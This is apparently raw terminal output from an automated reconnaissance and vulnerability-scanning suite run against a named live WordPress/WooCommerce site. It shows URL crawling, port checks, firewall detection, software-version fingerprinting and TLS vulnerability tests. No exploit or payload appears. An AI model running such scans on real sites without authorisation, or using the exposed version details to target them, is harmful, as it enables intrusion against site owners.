[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 85 / 100 [1;37m][0;37m-[05:19:40][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/××ª× ×-××§××š××ª/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 86 / 100 [1;37m][0;37m-[05:19:41][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/gallery-press/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 87 / 100 [1;37m][0;37m-[05:19:42][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/×××××-×××š××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 88 / 100 [1;37m][0;37m-[05:19:43][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/custom-packages/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 89 / 100 [1;37m][0;37m-[05:19:44][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/×××š××¢-×××š×/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 90 / 100 [1;37m][0;37m-[05:19:44][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/test-custom-packages/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 91 / 100 [1;37m][0;37m-[05:19:44][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×ª×§× ××-×¢×××-×ª×©×××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 92 / 100 [1;37m][0;37m-[05:19:45][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/category/news/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 93 / 100 [1;37m][0;37m-[05:19:46][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/×××××-××××××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare  , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 94 / 100 [1;37m][0;37m-[05:19:46][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×¢×€××-××€×¢×-××š××©×× ×/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare  , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 95 / 100 [1;37m][0;37m-[05:19:46][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/selected-package/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare  , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 96 / 100 [1;37m][0;37m-[05:19:47][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/contact-test/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 97 / 100 [1;37m][0;37m-[05:19:48][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/choose-package/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 98 / 100 [1;37m][0;37m-[05:19:50][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/×š××©××-×× ××××××š/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 99 / 100 [1;37m][0;37m-[05:19:50][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/2016/11/25/×××š×§×Š××-×××-×××©×€××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m

[1;37m[ INFO ] [ Shutting down ][0m
[1;37m[ INFO ] [ End of process INURLBR at [31-12-2017 05:19:50][0m
[1;37m[ INFO ] [0m[02;31m[ TOTAL FILTERED VALUES ]::[1;37m [ 0 ][0m
[1;37m[ INFO ] [02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-flybox.co.il.txt  ][0m
[1;37m|_________________________________________________________________________________________[0m

[1;37m\_________________________________________________________________________________________/[0m

[91m + -- --=[Port 110 closed... skipping.[0m
[91m + -- --=[Port 111 closed... skipping.[0m
[91m + -- --=[Port 135 closed... skipping.[0m
[91m + -- --=[Port 139 closed... skipping.[0m
[91m + -- --=[Port 161 closed... skipping.[0m
[91m + -- --=[Port 162 closed... skipping.[0m
[91m + -- --=[Port 389 closed... skipping.[0m
[93m + -- --=[Port 443 opened... running tests...[0m
[92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking https://flybox.co.il
The site https://flybox.co.il is behind a CloudFlare
Number of requests: 1

[92m + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +[0m
[92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
[1m[34mhttps://flybox.co.il[0m [301 Moved Permanently] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37mPHPSESSID,__cfduid,qtrans_front_language[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.74.239[0m], [1m[37mPHP[0m[[1m[32m7.0.13[0m], [1m[37mRedirectLocation[0m[[37mhttps://www.flybox.co.il/[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m], [1m[37mX-Powered-By[0m[[37mPHP/7.0.13[0m]
[1m[34mhttps://www.flybox.co.il/[0m [200 OK] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37mPHPSESSID,__cfduid,qtrans_front_language[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mFrame[0m, [1m[37mGoogle-Analytics[0m[[1m[32mUniversal[0m][[1m[36mUA-87930745-1[0m], [1m[37mHTML5[0m, [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.74.239[0m], [1m[37mJQuery[0m[[1m[32m1.0.5,2.1.3[0m], [1m[37mMetaGenerator[0m[[37mWooCommerce 2.5.5,WordPress 4.5.6,qTranslate-X 3.4.6.8[0m], [1m[37mOpen-Graph-Protocol[0m[[1m[32mwebsite[0m], [1m[37mPHP[0m[[1m[32m7.0.13[0m], [1m[37mScript[0m[[37mapplication/ld+json,text/javascript[0m], [1m[37mTitle[0m[[1m[33mFlybox - ×××š×§×Š×× ×××š×× ××× ×××©×€×× ×××××š××! ×× ××š×ª ×š×× ××××¢× ×××©×š××[0m], [1m[37mUncommonHeaders[0m[[37mlink,access-control-allow-origin,cf-ray[0m], [1m[37mVimeo[0m, [1m[37mWordPress[0m[[1m[32m4.5.6[0m], [1m[37mX-Powered-By[0m[[37mPHP/7.0.13[0m], [1m[37mX-UA-Compatible[0m[[37mIE=edge[0m]

[92m + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +[0m
Version: [32m1.11.10-static[0m
OpenSSL 1.0.2-chacha (1.0.2g-dev)
[0m
Testing SSL server [32mflybox.co.il[0m on port [32m443[0m using SNI name [32mflybox.co.il[0m

  [1;34mTLS Fallback SCSV:[0m
Server [31mdoes not[0m support TLS Fallback SCSV

  [1;34mTLS renegotiation:[0m
[32mSecure[0m session renegotiation supported

  [1;34mTLS Compression:[0m
Compression [32mdisabled[0m

  [1;34mHeartbleed:[0m
TLS 1.2 [32mnot vulnerable[0m to heartbleed
TLS 1.1 [32mnot vulnerable[0m to heartbleed
TLS 1.0 [32mnot vulnerable[0m to heartbleed

  [1;34mSupported Server Cipher(s):[0m
[32mPreferred[0m TLSv1.2  [32m256[0m bits  [32mECDHE-ECDSA-CHACHA20-POLY1305[0m Curve P-256 DHE 256
Accepted  TLSv1.2  [32m128[0m bits  [32mECDHE-ECDSA-AES128-GCM-SHA256[0m Curve P-256 DHE 256
Accepted  TLSv1.2  [32m128[0m bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
Accepted  TLSv1.2  [32m128[0m bits  ECDHE-ECDSA-AES128-SHA256     Curve P-256 DHE 256
Accepted  TLSv1.2  [32m256[0m bits  [32mECDHE-ECDSA-AES256-GCM-SHA384[0m Curve P-256 DHE 256
Accepted  TLSv1.2  [32m256[0m bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
Accepted  TLSv1.2  [32m256[0m bits  ECDHE-ECDSA-AES256-SHA384     Curve P-256 DHE 256
[32mPreferred[0m TLSv1.1  [32m128[0m bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
Accepted  TLSv1.1  [32m256[0m bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
[32mPreferred[0m [33mTLSv1.0[0m  [32m128[0m bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
Accepted  [33mTLSv1.0[0m  [32m256[0m bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256

  [1;34mSSL Certificate:[0m
Signature Algorithm: ecdsa-with-SHA256
Subject:  sni165065.cloudflaressl.com
Altnames: DNS:sni165065.cloudflaressl.com, DNS:*.aonlineorder.tk, DNS:*.bestproductthisyear.tk, DNS:*.bigsale135store.tk, DNS:*.bigsale171store.tk, DNS:*.bigsale215store.tk, DNS:*.bigsale248store.tk, DNS:*.bigsale281store.tk, DNS:*.bjfhiu.tk, DNS:*.bsmartbuyer.tk, DNS:*.bsmartonlineshop.tk, DNS:*.btokoonlinemurah.tk, DNS:*.budgettrouwfilm.nl, DNS:*.dbranded.tk, DNS:*.eawesomemarket.tk, DNS:*.emmom.tk, DNS:*.flybox.co.il, DNS:*.fmarketplus.tk, DNS:*.ftopbuy.tk, DNS:*.h1xv9oacp.ga, DNS:*.ialliexpress.tk, DNS:*.iowist.com, DNS:*.ipaytoko.tk, DNS:*.iperfectmarket.tk, DNS:*.ismartxpress.tk, DNS:*.jsmartonlineshop.tk, DNS:*.jtopcharts.tk, DNS:*.lalliexpress.tk, DNS:*.lpayperclick.tk, DNS:*.lpremiumonlineshop.tk, DNS:*.onlinekanyakumari.com, DNS:*.osmartbuyer.tk, DNS:*.pawesomemarket.tk, DNS:*.pbelimudah.tk, DNS:*.rlinkaliexpress.tk, DNS:*.rnesaliexpress.tk, DNS:*.samriddle.website, DNS:*.snapcracka.us, DNS:*.stokoonlinemurah.tk, DNS:*.taeaj.tk, DNS:*.techxpertsllc.com, DNS:*.vbrs.co.uk, DNS:*.wholesaleonline114.tk, DNS:*.wholesaleonline4.tk, DNS:*.wholesaleonline55.tk, DNS:*.wittcatt.stream, DNS:aonlineorder.tk, DNS:bestproductthisyear.tk, DNS:bigsale135store.tk, DNS:bigsale171store.tk, DNS:bigsale215store.tk, DNS:bigsale248store.tk, DNS:bigsale281store.tk, DNS:bjfhiu.tk, DNS:bsmartbuyer.tk, DNS:bsmartonlineshop.tk, DNS:btokoonlinemurah.tk, DNS:budgettrouwfilm.nl, DNS:dbranded.tk, DNS:eawesomemarket.tk, DNS:emmom.tk, DNS:flybox.co.il, DNS:fmarketplus.tk, DNS:ftopbuy.tk, DNS:h1xv9oacp.ga, DNS:ialliexpress.tk, DNS:iowist.com, DNS:ipaytoko.tk, DNS:iperfectmarket.tk, DNS:ismartxpress.tk, DNS:jsmartonlineshop.tk, DNS:jtopcharts.tk, DNS:lalliexpress.tk, DNS:lpayperclick.tk, DNS:lpremiumonlineshop.tk, DNS:onlinekanyakumari.com, DNS:osmartbuyer.tk, DNS:pawesomemarket.tk, DNS:pbelimudah.tk, DNS:rlinkaliexpress.tk, DNS:rnesaliexpress.tk, DNS:samriddle.website, DNS:snapcracka.us, DNS:stokoonlinemurah.tk, DNS:taeaj.tk, DNS:techxpertsllc.com, DNS:vbrs.co.uk, DNS:wholesaleonline114.tk, DNS:wholesaleonline4.tk, DNS:wholesaleonline55.tk, DNS:wittcatt.stream
Issuer:   COMODO ECC Domain Validation Secure Server CA 2

Not valid before: [32mDec 17 00:00:00 2017 GMT[0m
Not valid after:  [32mJun 25 23:59:59 2018 GMT[0m
[1m
###########################################################
    testssl       2.9dev from [m[1mhttps://testssl.sh/dev/[m
[1m
      This program is free software. Distribution and
             modification under GPLv2 permitted.
      USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!

       Please file bugs @ [m[1mhttps://testssl.sh/bugs/[m
[1m
###########################################################[m

 Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
 on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
 (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")


[1mTesting all IPv4 addresses (port 443): [m104.31.75.239 104.31.74.239
-----------------------------------------------------
[7m Start 2017-12-31 05:20:05        -->> 104.31.75.239:443 (flybox.co.il) <<--[m

 further IP addresses:   104.31.74.239 2400:cb00:2048:1::681f:4bef
                         2400:cb00:2048:1::681f:4aef
 rDNS (104.31.75.239):   --
 Service detected:       HTTP


[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m

[1m SSLv2      [m[1;32mnot offered (OK)[m
[1m SSLv3      [m[1;32mnot offered (OK)[m
[1m TLS 1      [moffered
[1m TLS 1.1    [moffered
[1m TLS 1.2    [m[1;32moffered (OK)[m
[1m TLS 1.3    [m[1;32moffered (OK)[m: draft 18
[1m SPDY/NPN   [mh2, spdy/3.1, http/1.1 (advertised)
[1m HTTP2/ALPN [mh2, spdy/3.1, http/1.1 (offered)

[1m[4m Testing ~standard cipher categories [m

[1m NULL ciphers (no encryption)                  [m[1;32mnot offered (OK)[m
[1m Anonymous NULL Ciphers (no authentication)    [m[1;32mnot offered (OK)[m
[1m Export ciphers (w/o ADH+NULL)                 [m[1;32mnot offered (OK)[m
[1m LOW: 64 Bit + DES encryption (w/o export)     [m[1;32mnot offered (OK)[m
[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4])    [m[0;32mnot offered (OK)[m
[1m Triple DES Ciphers (Medium)                   [mnot offered (OK)
[1m High encryption (AES+Camellia, no AEAD)       [m[0;32moffered (OK)[m
[1m Strong encryption (AEAD ciphers)              [m[1;32moffered (OK)[m


[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m

[0;32m PFS is offered (OK)[m          TLS13-AES-256-GCM-SHA384
                              TLS13-CHACHA20-POLY1305-SHA256
                              ECDHE-ECDSA-CHACHA20-POLY1305-OLD
                              ECDHE-ECDSA-AES256-GCM-SHA384
                              ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
                              ECDHE-ECDSA-CHACHA20-POLY1305
                              TLS13-AES-128-GCM-SHA256
                              ECDHE-ECDSA-AES128-GCM-SHA256
                              ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
[1m Elliptic curves offered:     [msecp224r1 [0;32mprime256v1[m [0;32msecp384r1[m [0;32msecp521r1[m [0;32mX25519[m


[1m[4m Testing server preferences [m

[1m Has server cipher order?     [m[1;32myes (OK)[m
[1m Negotiated protocol          [m[1;32mTLSv1.3[m
[1m Negotiated cipher            [m[1;32mTLS13-AES-256-GCM-SHA384[m, [0;32m253 bit ECDH (X25519)[m
[1m Cipher order[m
    TLSv1:     ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
    TLSv1.1:   ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
    TLSv1.2:   ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
               ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
               ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
               ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
    TLSv1.3:   TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
               TLS13-AES-128-GCM-SHA256


[1m[4m Testing server defaults (Server Hello) [m

[1m TLS extensions (standard)    [m"renegotiation info/#65281" "server name/#0"
                              "session ticket/#35" "status request/#5"
                              "next protocol/#13172" "EC point formats/#11"
                              "extended master secret/#23"
                              "signed certificate timestamps/#18"
                              "application layer protocol negotiation/#16"
[1m Session Ticket RFC 5077 hint [m64800 seconds, session tickets keys seems to be rotated < daily
[1m SSL Session ID support       [myes
[1m Session Resumption           [mTickets: yes, ID: yes
[1m TLS clock skew[m               -1 sec from localtime
[1m Signature Algorithm          [m[0;32mECDSA with SHA256[m
[1m Server key size              [mECDSA [0;32m256[m bits
[1m Fingerprint / Serial         [mSHA1 241F2CD8DFACDEAEB1AEB7104A94653708701987 / 4B78D31156C5EC99DAF67C53B1FDAC49
                              SHA256 39F0EFA4589C2C3EE02214DE224E9EF7BAED9F31A533D05A131ED458E82F53EE
[1m Common Name (CN)             [m[3msni165065.cloudflaressl.com[m (request w/o SNI didn't succeed, usual for EC certificates)
[1m subjectAltName (SAN)         [m[3msni165065.cloudflaressl.com *.aonlineorder.tk
                              *.bestproductthisyear.tk *.bigsale135store.tk
                              *.bigsale171store.tk *.bigsale215store.tk
                              *.bigsale248store.tk *.bigsale281store.tk
                              *.bjfhiu.tk *.bsmartbuyer.tk
                              *.bsmartonlineshop.tk *.btokoonlinemurah.tk
                              *.budgettrouwfilm.nl *.dbranded.tk
                              *.eawesomemarket.tk *.emmom.tk *.flybox.co.il
                              *.fmarketplus.tk *.ftopbuy.tk *.h1xv9oacp.ga
                              *.ialliexpress.tk *.iowist.com *.ipaytoko.tk
                              *.iperfectmarket.tk *.ismartxpress.tk
                              *.jsmartonlineshop.tk *.jtopcharts.tk
                              *.lalliexpress.tk *.lpayperclick.tk
                              *.lpremiumonlineshop.tk *.onlinekanyakumari.com
                              *.osmartbuyer.tk *.pawesomemarket.tk
                              *.pbelimudah.tk *.rlinkaliexpress.tk
                              *.rnesaliexpress.tk *.samriddle.website
                              *.snapcracka.us *.stokoonlinemurah.tk *.taeaj.tk
                              *.techxpertsllc.com *.vbrs.co.uk
                              *.wholesaleonline114.tk *.wholesaleonline4.tk
                              *.wholesaleonline55.tk *.wittcatt.stream
                              aonlineorder.tk bestproductthisyear.tk
                              bigsale135store.tk bigsale171store.tk
                              bigsale215store.tk bigsale248store.tk
                              bigsale281store.tk bjfhiu.tk bsmartbuyer.tk
                              bsmartonlineshop.tk btokoonlinemurah.tk
                              budgettrouwfilm.nl dbranded.tk eawesomemarket.tk
                              emmom.tk flybox.co.il fmarketplus.tk ftopbuy.tk
                              h1xv9oacp.ga ialliexpress.tk iowist.com
                              ipaytoko.tk iperfectmarket.tk ismartxpress.tk
                              jsmartonlineshop.tk jtopcharts.tk lalliexpress.tk
                              lpayperclick.tk lpremiumonlineshop.tk
                              onlinekanyakumari.com osmartbuyer.tk
                              pawesomemarket.tk pbelimudah.tk
                              rlinkaliexpress.tk rnesaliexpress.tk
                              samriddle.website snapcracka.us
                              stokoonlinemurah.tk taeaj.tk techxpertsllc.com
                              vbrs.co.uk wholesaleonline114.tk
                              wholesaleonline4.tk wholesaleonline55.tk
                              wittcatt.stream [m
[1m Issuer                       [m[3mCOMODO ECC Domain Validation Secure Server CA 2[m ([3mCOMODO CA Limited[m from [3mGB[m)
[1m Trust (hostname)             [m[0;32mOk via SAN[m (SNI mandatory)
[1m Chain of trust[m               [0;32mOk   [m[0;35m[m
[1m EV cert[m (experimental)       no
[1m Certificate Expiration       [m[0;32m176 >= 60 days[m (2017-12-16 19:00 --> 2018-06-25 19:59 -0400)
[1m # of certificates provided[m   3
[1m Certificate Revocation List  [mhttp://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
[1m OCSP URI                     [mhttp://ocsp.comodoca4.com
[1m OCSP stapling                [m[0;32moffered[m
[1m OCSP must staple             [mno
[1m DNS CAA RR[m (experimental)    [1;33mnot offered[m
[1m Certificate Transparency     [m[0;32myes[m (TLS extension)


[1m[4m Testing HTTP header response @ "/" [m

[1m HTTP Status Code           [m  301 Moved Permanently, redirecting to "https://www.flybox.co.il/"
[1m HTTP clock skew              [m0 sec from localtime
[1m Strict Transport Security    [m--
[1m Public Key Pinning           [m--
[1m Server banner                [mcloudflare
[1m Application banner           [m[33m[1mX-Powered-By(B[m: PHP/[33m7(B[m.[33m0(B[m.[33m1(B[m[33m3(B[m
[1m Cookie(s)                    [m3 issued: [0;33mNONE[m secure, [0;32m1/3[m HttpOnly -- maybe better try target URL of 30x
[1m Security headers             [m[0;33m--[m
[1m Reverse Proxy banner         [m--


[1m[4m Testing vulnerabilities [m

[1m Heartbleed[m (CVE-2014-0160)                [1;32mnot vulnerable (OK)[m, no heartbeat extension
[1m CCS[m (CVE-2014-0224)                       [1;32mnot vulnerable (OK)[m
[1m Ticketbleed[m (CVE-2016-9244), experiment.  [1;32mnot vulnerable (OK)[m, no session tickets
